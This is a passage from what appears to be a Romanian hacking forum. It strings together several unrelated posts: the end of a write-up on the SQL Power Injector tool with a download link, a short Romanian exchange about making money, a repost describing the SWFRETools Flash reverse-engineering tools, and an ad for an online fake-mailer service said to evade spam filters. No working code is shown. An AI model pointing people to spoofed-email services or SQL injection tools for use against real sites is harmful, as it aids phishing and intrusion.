always the better. You will see some examples in the following statistics. Even though you can go up to 50 threads, I have discovered that around 10 threads it's starting to have errors and getting slower and slower. So again bigger number of threads is not necessary better. I must warn as well that the higher number of threads is, the higher is the chances to crash the web application (web server or database) I must thank Nathaniel Felsen to have allowed me to test on one of his web server and my wife Elizabeth to have done all the tedious tests for me in her free time. Here are the characteristics of the computer used to make the tests: AMD Athlon ? 64 X2 Dual Core Processor 4200+ GHz 2 GB of RAM Windows XP SP 2 ADSL 1 MB/s Ping round trip average time of 173 ms Download: http://www.sqlpowerinjector.com/download.htm

Nu, cam Google incepuse monopolizarea, Microsoft a cam ramas in urma...

Cui ii pasa de unde au ideea, problema noastra e sa gasim metode sa scoatem bani multi, usor si desigur legal din asta

SWFRETools 1.1.0 - Adobe Flash SWF file reverse engineering SWFRETools package contains three different tools. The most advanced tool is called Flash Dissector. It is a Java-based GUI tool you can use to inspect the binary content of SWF files. The second tool is a Java-based command-line tool called Minimizer. This tool is useful for vulnerability researchers that have a SWF file that crashes Flash Player and now they want to get rid of all parts of the SWF file that are not related to the crash. The third tool is a primitive Python-based debugger that can be used to hook and trace the Flash Player executable. Download: https://github.com/sporst/SWFREtools/downloads Sursa: SWFRETools 1.1.0 - Adobe Flash SWF file reverse engineering ! ~ THN : The Hackers News

Online Fake Mailer As IT managed services are now focuing on clouds, So is the information security. Spam mails are the biggest threat to every individual and it is not going to end any sooner. But now a days spam filter do their job quit efficiently making spammers life a bit worried. so here is a online we mean a “cloud service” which can test both spammers and spam filters skills. Small list if features Email Doesn’t go in spam folder Instant delivery of emails With Attachment Support With HTML Editor And Many Other Features http://emkei.cz/